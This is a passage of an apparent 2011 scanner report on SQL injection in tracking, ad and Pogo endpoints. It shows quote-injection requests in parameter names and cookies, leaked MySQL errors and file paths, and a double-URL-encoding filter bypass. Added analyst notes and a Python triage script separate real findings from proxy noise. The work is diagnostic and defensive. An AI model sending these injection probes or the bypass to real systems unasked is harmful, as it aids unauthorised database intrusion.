Path:   /1x1_map.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter and a database error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in 1.10, the name of the parameter (1'=1 against 1''=1) is what reaches the query, so the script builds SQL from request parameter names rather than from a specific expected value.

The database appears to be MySQL.

Remediation detail

Suppress the error output and, as for 1.10, stop building SQL from request parameter names; read only the expected parameters and bind their values as parameters.

Request 1

GET /1x1_map.php?1'=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 675
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0 /var/d
...[SNIP]...

Request 2

GET /1x1_map.php?1''=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.13. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ses15 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4252/4762/6670-15.js

Issue detail

The ses15 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ses15 cookie and a general error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The captured evidence does not support the finding: Response 1 is an HTTP/1.0 504 Gateway Time-out from a front-end proxy ("The server didn't respond in time"), not an application error, while Response 2 is an ordinary 200 carrying the ad script. One timed-out request out of two is infrastructure noise; repeat the single-quote request several times and compare again before reporting. Response 2 also re-issues ses15=4762^3 in place of the injected 4762^2'', which suggests the cookie's counter is parsed and rewritten rather than echoed into a query.

Request 1

GET /a/4252/4762/6670-15.js?cb= HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ses15=4762^2'; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;

Response 1

HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>504 Gateway Time-out</h1>
The server didn't respond in time.
</body></html>

Request 2

GET /a/4252/4762/6670-15.js?cb= HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ses15=4762^2''; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:25:40 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106459; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188204.js^2^1294536315^1294539940; expires=Sun, 16-Jan-2011 02:25:40 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2391

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188204"
...[SNIP]...

1.14. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [rsid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4252/4762/6942-2.js

Issue detail

The rsid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rsid cookie and a general error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in 1.13, the "error" is a 504 Gateway Time-out from the proxy in front of the application and the second request simply succeeded, so this is almost certainly a timing artefact rather than a reaction to the quote; Response 2 updates ses2 and csi2 and does not touch rsid at all. Re-test before treating it as a finding.
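Findings 1.13 and 1.14 rest on a 504 from a proxy, 1.6 and 1.7 on a generic login page, and 1.9 to 1.12 on a real MySQL message, yet the scanner describes all of them as "an error message". The Python below is an added example, not part of this report, that triages a one-quote/two-quote response pair into those cases and pulls the statement fragment and leaked file path out of a MySQL message. The sample responses are constructed from fragments visible in this report; the regular expressions and category names are my own.

```python
"""Triage of the scanner's two-response evidence. Added example; the sample
bodies are trimmed reconstructions of what the report shows."""
import re
from typing import Dict, Tuple

Response = Tuple[int, str]          # (HTTP status, response body)

# Error signatures that justify "Confidence: Certain" (the MySQL text is the
# one seen in this report; the others are common equivalents).
DB_ERROR = re.compile(
    r"You have an error in your SQL syntax"   # MySQL
    r"|unterminated quoted string"             # PostgreSQL
    r"|Unclosed quotation mark"                # Microsoft SQL Server
    r"|ORA-\d{5}",                             # Oracle
    re.IGNORECASE)
# Pages emitted by a proxy or load balancer in front of the application.
GATEWAY = re.compile(r"Gateway Time-?out|Bad Gateway|Service Unavailable", re.IGNORECASE)
# What a MySQL syntax error leaks: the statement fragment, and any absolute path.
MYSQL_NEAR = re.compile(r"right syntax to use near '(.*)' at line (\d+)", re.DOTALL)
ABS_PATH = re.compile(r"/(?:var|usr|home|etc|opt|srv)/[^\s'\"<>]+")


def classify(one_quote: Response, two_quotes: Response) -> str:
    """Say what kind of differential the scanner's two responses show."""
    s1, b1 = one_quote
    s2, b2 = two_quotes
    if s1 in (502, 503, 504) or GATEWAY.search(b1):
        return "infrastructure noise"          # repeat the request before believing it
    db1, db2 = bool(DB_ERROR.search(b1)), bool(DB_ERROR.search(b2))
    if db1 and not db2:
        return "database error oracle"         # the quote reached the SQL parser
    if db1 and db2:
        return "error regardless of quoting"   # quoting is not the trigger
    if s1 != s2:
        return "status differential"
    if b1 != b2:
        return "generic differential"          # e.g. a catch-all error or login page
    return "no differential"


def leak_details(body: str) -> Dict[str, object]:
    """Pull the reconstructable query fragment, line number and leaked paths."""
    m = MYSQL_NEAR.search(body)
    return {
        "fragment": m.group(1) if m else None,
        "line": int(m.group(2)) if m else None,
        "paths": ABS_PATH.findall(body),
    }


# Constructed samples, trimmed from what the report shows for each finding.
MAVNT_ERR: Response = (200,
    "<b>Fatal error</b>: Uncaught exception 'DBException' with message "
    "'You have an error in your SQL syntax; check the manual that corresponds to "
    "your MySQL server version for the right syntax to use near ''51270''' at line 1' "
    "in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204")   # 1.9, Response 1
TRACKING_GIF: Response = (200, "GIF89a...")                                 # 1.9, Response 2
PROXY_504: Response = (504, "<html><body><h1>504 Gateway Time-out</h1>\n"
                            "The server didn't respond in time.\n</body></html>")  # 1.13
AD_SCRIPT: Response = (200, 'rubicon_cb = Math.random(); window.rubicon_ad = "3188204"')
POGO_ONE: Response = (200, 's.referrer="http://game3.pogo.com/error/invalidurl.html";\n'
                           's.pageName="Pogo Unauth generic Log In Page";')        # 1.6
POGO_TWO: Response = (200, 's.pageName="Pogo Unauth generic Log In Page";')


if __name__ == "__main__":
    for label, pair in [("mavnt 1.9", (MAVNT_ERR, TRACKING_GIF)),
                        ("rubicon 1.13", (PROXY_504, AD_SCRIPT)),
                        ("pogo 1.6", (POGO_ONE, POGO_TWO))]:
        print(f"{label:13} {classify(*pair)}")
    print(leak_details(MAVNT_ERR[1]))
```

Only the "database error oracle" verdict deserves the report's Certain confidence; "infrastructure noise" should be re-tested and "generic differential" reviewed by hand, which matches how the three groups of findings above actually hold up.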

Request 1

GET /a/4252/4762/6942-2.js?cb=0.35984857589937747 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e'; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; rpb=4210%3D1%264214%3D1; put_1197=3271971346728586924; cd=false; rdk=4252/4762; ses2=4762^1; csi2=3146355.js^1^1294536507^1294536507

Response 1

HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>504 Gateway Time-out</h1>
The server didn't respond in time.
</body></html>

Request 2

GET /a/4252/4762/6942-2.js?cb=0.35984857589937747 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e''; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; rpb=4210%3D1%264214%3D1; put_1197=3271971346728586924; cd=false; rdk=4252/4762; ses2=4762^1; csi2=3146355.js^1^1294536507^1294536507

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:25:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 03:25:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106445; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3156581.js^1^1294539954^1294539954&3146355.js^1^1294536507^1294536507; expires=Sun, 16-Jan-2011 02:25:54 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2284

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3156581"
...[SNIP]...

1.15. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 [mt_clk cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pixeltrack66.com
Path:   /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409

Issue detail

The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie and a database error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The MySQL message echoes the statement fragment '54267db83a49b89cd0644d669488302a'' and record_adjust2=1 at line 2, so the cookie value sits in a quoted string literal of a multi-line statement that continues with further conditions; with '' the quoting balances and the tracker completes its 302 redirect. The response also copies the injected value into a new cookie (Set-Cookie: mt_imp=...%27), so the payload is persisted in the browser and resubmitted on later requests.

The database appears to be MySQL.

Remediation detail

Suppress SQL error text in responses, and bind the cookie value as a parameter in the statement that currently embeds it (the one containing record_adjust2=1). Validate mt_clk against its expected form (a 32-character hexadecimal token) before use, and do not copy it verbatim into mt_imp.

Request 1

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:13:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:13:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.16. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 [mt_clk cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pixeltrack66.com
Path:   /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409

Issue detail

The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie and a database error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. This is the same code path as 1.15 reached through a different web_id: the identical fragment ('...'' and record_adjust2=1, line 2) and the same mt_imp cookie echo of the injected value show one statement serving all of these URLs.

The database appears to be MySQL.

Remediation detail

Suppress SQL error text in responses and fix the shared statement once, as in 1.15: bind mt_clk as a parameter, validate it as a 32-character hexadecimal token, and stop echoing it into mt_imp.

Request 1

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.17. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= [mt_clk cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pixeltrack66.com
Path:   /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=

Issue detail

The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:14:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:14:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.18. http://www.pogo.com/ [com.pogo.ga cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /

Issue detail

The com.pogo.ga cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.ga cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?pageSection=homnav_logo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga='; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:57:16 GMT
Server: Apache-Coyote/1.1
Content-Length: 430000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
<a href="http://puzzle-games.pogo.com/games/stackem?pageSection=free_home_all_games2_img_stax">
...[SNIP]...

Request 2

GET /?pageSection=homnav_logo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=''; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2F%3FpageSection%3Dhomnav_logo
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:57:18 GMT
Server: Apache-Coyote/1.1


1.19. http://www.pogo.com/action/pogop/welcome.do [com.pogo.info cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /action/pogop/welcome.do

Issue detail

The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_bottomtext HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
